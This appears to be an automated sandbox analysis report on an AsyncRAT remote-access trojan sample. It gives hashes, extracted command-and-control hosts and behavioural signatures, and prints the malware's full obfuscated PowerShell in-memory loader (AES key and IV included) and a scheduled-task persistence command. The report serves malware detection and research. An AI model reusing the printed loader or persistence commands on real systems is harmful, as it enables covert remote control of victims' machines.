Analysis
-
max time kernel
61s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
01-02-2023 20:06
Behavioral task
behavioral1
Sample
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
Resource
win7-20221111-en
General
-
Target
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe
-
Size
72KB
-
MD5
8cb1d168cf75e754026203935dcfa023
-
SHA1
ba18d6636f1c59a72fa8042cff7c1e8fdf69eecb
-
SHA256
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126
-
SHA512
7254e3bc08701fb233d1b0c340fd6104b9fc4d36ab962f7ac541f0aee539fe3c9a7b3fa692968a977e68690ad183e77d2b5f962b1265983b4771773ff55c62ae
-
SSDEEP
1536:/rGBmYaZyxKeBy3bCXS4ZeUSlACnztfx:/rGBmYaZyxZBy3bCHelAI9x
Malware Config
Extracted
asyncrat
0.5.7B
Default
churchmon.ddns.net:6606
churchmon.ddns.net:7707
churchmon.ddns.net:8808
churchmon21.ddns.net:6606
churchmon21.ddns.net:7707
churchmon21.ddns.net:8808
churchmon22.ddns.net:6606
churchmon22.ddns.net:7707
churchmon22.ddns.net:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmp asyncrat -
Executes dropped EXE 1 IoCs
Processes:
eesdbo.bat.exepid process 3344 eesdbo.bat.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 43 api.ipify.org 44 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 3372 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exeeesdbo.bat.exepid process 3964 powershell.exe 3964 powershell.exe 3344 eesdbo.bat.exe 3344 eesdbo.bat.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exepowershell.exeeesdbo.bat.exedescription pid process Token: SeDebugPrivilege 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe Token: SeDebugPrivilege 3964 powershell.exe Token: SeDebugPrivilege 3344 eesdbo.bat.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
eesdbo.bat.exepid process 3344 eesdbo.bat.exe 3344 eesdbo.bat.exe -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
eesdbo.bat.exepid process 3344 eesdbo.bat.exe 3344 eesdbo.bat.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
eesdbo.bat.exepid process 3344 eesdbo.bat.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.execmd.execmd.exepowershell.execmd.exeeesdbo.bat.exedescription pid process target process PID 4644 wrote to memory of 240 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 4644 wrote to memory of 240 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 4644 wrote to memory of 240 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 4644 wrote to memory of 2256 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 4644 wrote to memory of 2256 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 4644 wrote to memory of 2256 4644 8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe cmd.exe PID 240 wrote to memory of 3964 240 cmd.exe powershell.exe PID 240 wrote to memory of 3964 240 cmd.exe powershell.exe PID 240 wrote to memory of 3964 240 cmd.exe powershell.exe PID 2256 wrote to memory of 3372 2256 cmd.exe timeout.exe PID 2256 wrote to memory of 3372 2256 cmd.exe timeout.exe PID 2256 wrote to memory of 3372 2256 cmd.exe timeout.exe PID 3964 wrote to memory of 3800 3964 powershell.exe cmd.exe PID 3964 wrote to memory of 3800 3964 powershell.exe cmd.exe PID 3964 wrote to memory of 3800 3964 powershell.exe cmd.exe PID 3800 wrote to memory of 3344 3800 cmd.exe eesdbo.bat.exe PID 3800 wrote to memory of 3344 3800 cmd.exe eesdbo.bat.exe PID 3800 wrote to memory of 3344 3800 cmd.exe eesdbo.bat.exe PID 3344 wrote to memory of 3560 3344 eesdbo.bat.exe schtasks.exe PID 3344 wrote to memory of 3560 3344 eesdbo.bat.exe schtasks.exe PID 3344 wrote to memory of 3560 3344 eesdbo.bat.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"C:\Users\Admin\AppData\Local\Temp\8712a416dc2d6bb701207d1f1d94c4b94df1ccd620fd294487bc46150c74a126.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"' & exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\eesdbo.bat"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eesdbo.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe"eesdbo.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $DlAMm = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\eesdbo.bat').Split([Environment]::NewLine);foreach ($gnxLA in $DlAMm) { if ($gnxLA.StartsWith(':: ')) { $EieGe = $gnxLA.Substring(3); break; }; };$CtMSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($EieGe);$CdbBY = New-Object System.Security.Cryptography.AesManaged;$CdbBY.Mode = [System.Security.Cryptography.CipherMode]::CBC;$CdbBY.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$CdbBY.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NEPcZ0sSGxev/0ytodeTKgGxdiSyFK6PvVJKMsPopm0=');$CdbBY.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x/ZAOJI37zOKAo+7A/xutg==');$bwBZg = $CdbBY.CreateDecryptor();$CtMSE = $bwBZg.TransformFinalBlock($CtMSE, 0, $CtMSE.Length);$bwBZg.Dispose();$CdbBY.Dispose();$OapWv = New-Object System.IO.MemoryStream(, $CtMSE);$Otndw = New-Object System.IO.MemoryStream;$HxJaj = New-Object System.IO.Compression.GZipStream($OapWv, [IO.Compression.CompressionMode]::Decompress);$HxJaj.CopyTo($Otndw);$HxJaj.Dispose();$OapWv.Dispose();$Otndw.Dispose();$CtMSE = $Otndw.ToArray();$HiNYF = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($CtMSE);$wpmOJ = $HiNYF.EntryPoint;$wpmOJ.Invoke($null, (, [string[]] ('')))5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "Window" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exe" /rl HIGHEST /f6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
15KB
MD5f5e94e7c77b98659fe7121ef0226b148
SHA1475f8cfc212b46db59b79b2bb08315eebe3ee05e
SHA256aaf5b408a2db7b3b7996970d30f0eecdfd0546c5de629ada6d89b4016bd1edc4
SHA5121407306f685c0ade37404097e423a96a9ff695d051a4d3c0175fb6d92c89bc5223245c03c899e71dd8f74fb857624b569ccc95a76363b6c2c9164675cfb580c5
-
C:\Users\Admin\AppData\Local\Temp\eesdbo.batFilesize
325KB
MD536438d908fc48e243fc04035eba3a6cd
SHA1a552a88e74440a1137b3a3a14e4089a630dfb855
SHA25680504bf8dd15434a9841595f3f9e405f8843dd53b292d8e30d9a15b53b51fa7a
SHA5123cea5f310c94129fe89c1cebfada52b4d0ac1d4f4e7be4ea06872b90e969b2bec4e322a127f6c4b02a9223ad6a29b21f90c1d627f233f938ded51da3ff6fd611
-
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\eesdbo.bat.exeFilesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
C:\Users\Admin\AppData\Local\Temp\tmpCB44.tmp.batFilesize
216B
MD50b02e6984b6c86cd90d891b95b015f50
SHA1e3d63bea04ffdbd051c051dfdd0b4824fefcea65
SHA256ab7f66d5c61be41a157a61d4c96eb6ac223a87ab66aa3ef0479450c763911b88
SHA512ab62cb71ee59aba5f48f03452d224408ee8932fec023277cccc9c833c6c49ac5c3798612e496b273850078af3401a6dcfe6f025a816ab1e29cdc3b846c4ac741
-
memory/240-138-0x0000000000000000-mapping.dmp
-
memory/2256-139-0x0000000000000000-mapping.dmp
-
memory/3344-161-0x00000000076D0000-0x0000000007720000-memory.dmpFilesize
320KB
-
memory/3344-159-0x0000000007580000-0x000000000758A000-memory.dmpFilesize
40KB
-
memory/3344-158-0x00000000073F0000-0x0000000007482000-memory.dmpFilesize
584KB
-
memory/3344-162-0x0000000007EF0000-0x0000000007FA2000-memory.dmpFilesize
712KB
-
memory/3344-156-0x0000000007870000-0x0000000007EEA000-memory.dmpFilesize
6.5MB
-
memory/3344-163-0x0000000008180000-0x0000000008342000-memory.dmpFilesize
1.8MB
-
memory/3344-153-0x0000000000000000-mapping.dmp
-
memory/3344-164-0x0000000009070000-0x0000000009688000-memory.dmpFilesize
6.1MB
-
memory/3372-142-0x0000000000000000-mapping.dmp
-
memory/3560-160-0x0000000000000000-mapping.dmp
-
memory/3800-152-0x0000000000000000-mapping.dmp
-
memory/3964-140-0x0000000000000000-mapping.dmp
-
memory/3964-150-0x0000000005FA0000-0x0000000005FC2000-memory.dmpFilesize
136KB
-
memory/3964-149-0x0000000005F50000-0x0000000005F6A000-memory.dmpFilesize
104KB
-
memory/3964-148-0x0000000005FF0000-0x0000000006086000-memory.dmpFilesize
600KB
-
memory/3964-147-0x0000000005A60000-0x0000000005A7E000-memory.dmpFilesize
120KB
-
memory/3964-146-0x0000000005390000-0x00000000053F6000-memory.dmpFilesize
408KB
-
memory/3964-145-0x00000000052C0000-0x00000000052E2000-memory.dmpFilesize
136KB
-
memory/3964-144-0x0000000004B20000-0x0000000005148000-memory.dmpFilesize
6.2MB
-
memory/3964-143-0x00000000044B0000-0x00000000044E6000-memory.dmpFilesize
216KB
-
memory/4644-132-0x0000000000740000-0x0000000000752000-memory.dmpFilesize
72KB
-
memory/4644-137-0x00000000069E0000-0x00000000069FE000-memory.dmpFilesize
120KB
-
memory/4644-136-0x0000000006A40000-0x0000000006AB6000-memory.dmpFilesize
472KB
-
memory/4644-135-0x0000000005590000-0x00000000055F6000-memory.dmpFilesize
408KB
-
memory/4644-134-0x0000000005AD0000-0x0000000006074000-memory.dmpFilesize
5.6MB
-
memory/4644-133-0x0000000005480000-0x000000000551C000-memory.dmpFilesize
624KB